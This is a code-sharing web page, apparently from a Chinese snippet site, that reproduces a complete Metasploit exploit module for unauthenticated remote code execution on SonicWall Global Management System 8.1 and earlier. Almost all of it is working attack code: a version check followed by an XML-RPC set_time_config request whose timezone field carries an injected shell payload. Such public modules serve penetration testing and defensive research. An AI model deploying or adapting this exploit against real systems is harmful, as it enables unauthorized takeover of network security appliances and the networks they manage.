扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "SonicWall Global Management System XMLRPC set_time_zone Unath RCE", 'Description' => %q{ This module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 (Build 8110.1197) and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire network security environment.' These vulnerable versions (8.1 Build 8110.1197 and below) do not prevent unauthenticated, external entities from making XML-RPC requests to port 21009 of the virtual app. After the XML-RPC call is made, a shell script is called like so: 'timeSetup.sh --tz="<code>command injection here</code>"' --usentp="blah"'. }, 'License' => MSF_LICENSE, 'Author' => [ 'Michael Flanders', #MSF Module 'kernelsmith' #Advisor ], 'References' => [ ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'], ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/'] ], 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [ [ 'SonicWall Global Management System Virtual Appliance', {} ], ], 'Payload' => { # Can't use ampersand, Java's XML-RPC parser will complain and return an error 'BadChars' => "\x26", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic bash telnet' } }, 'DisclosureDate' => "Jul 22 2016", 'DefaultTarget' => 0)) register_options( [ OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page. Defaults to 80/443 depending on SSL.']) ]) end def check if datastore['WEB_SERVER_PORT'] port_number = datastore['WEB_SERVER_PORT'] else port_number = datastore['SSL'] ? '443' : '80' end handler = datastore['SSL'] ? 'https' : 'http' res = request_url("#{handler}://#{rhost}:#{port_number}") unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/ return CheckCode::Safe end version = Gem::Version.new $1.to_s unless version <= Gem::Version.new('8.1') return CheckCode::Safe end CheckCode::Appears end def exploit unless check == CheckCode::Appears fail_with Failure::NotVulnerable, "The target is not vulnerable." end print_status "The target appears to be vulnerable, continuing exploit..." send_xml end def send_xml xml_body = <<~HERESTRING <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>set_time_config</methodName> <params> <param> <value> <struct> <member> <name>timezone</name> <value> <string>"<code>#{payload.encoded}</code>"</string> </value> </member> </struct> </value> </param> </params> </methodCall> HERESTRING res = send_request_raw({ 'method'=> 'POST', 'uri' => '/', 'data'=> xml_body, 'ctype' => 'text/xml; charset=UTF-8' }) unless res && res.body.include?("success") print_error("Error sending XML to #{rhost}:#{rport}") end end end |
体验盒子
